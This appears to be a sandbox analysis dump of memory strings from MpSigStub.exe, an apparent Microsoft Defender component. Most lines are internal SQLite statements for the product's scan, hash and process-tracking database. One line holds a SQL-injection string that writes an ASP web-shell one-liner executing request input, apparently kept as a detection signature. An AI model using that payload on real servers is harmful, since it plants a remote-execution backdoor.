Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18242976274.0000015B0B50C000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID, PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(20, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE PersistId = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(18, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmProcessInfo WHERE PPIDHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyInfo;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ValueMapArrayBlob FROM ValueMapArray WHERE Key = ? AND RecordType = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts WHERE AttributeCounts.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT Count(1) FROM DynSigRevisions;SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributeCounts ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM ValueMapArray WHERE ValueMapArray.Key = ? AND ValueMapArray.RecordType = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters; SELECT Key FROM AtomicCounters ORDER BY InsertTime ASC LIMIT 1; SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?; DELETE FROM AtomicCounters; DELETE FROM AtomicCounters WHERE ExpireTime < ?; DELETE FROM AtomicCounters WHERE AtomicCounters.Key = ?; SELECT Key FROM AtomicCounters WHERE AtomicCounters.Key = ?; UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(21, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileInfo;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AtomicCounters;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(17, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmHipsRuleInfo(ProcessInfoId, RuleAction, RuleId, IsAudit, IsInherited, State) VALUES (?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory;SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;[3
Source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp Binary or memory string: SELECT information FROM tdata where dataname = '%s' and g_name = '%s';
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ProcessInfo(FileName, ProcessId, CommandLine, StartTime, TokenElevation, TokenElevationType, IntegrityLevel) VALUES(? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE ID = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(19, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM NetworkIpFirewallRules WHERE NetworkIpFirewallRules.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(22, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(29, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId FROM BmFileStartupActions WHERE FilePathHash = ?DELETE FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;SELECT Count(1) FROM BmFileStartupActions;|
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SystemRegistryCache WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributeCounts;
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp Binary or memory string: insertinto[bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;')
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AmsiFileCache;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemRegistryCache(Key, FileIDHash, RegPath, RegOperation, NewRegType, OldRegType, OldRegData, NewRegData, InstanceTimeStamp) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AtomicCounters(Key, Name, Count, InsertTime, ExpireTime, UpdateTime) VALUES(? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO File(SHA1, MD5, lshashs, lshash, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n, Size, SHA256) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?, ?, ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
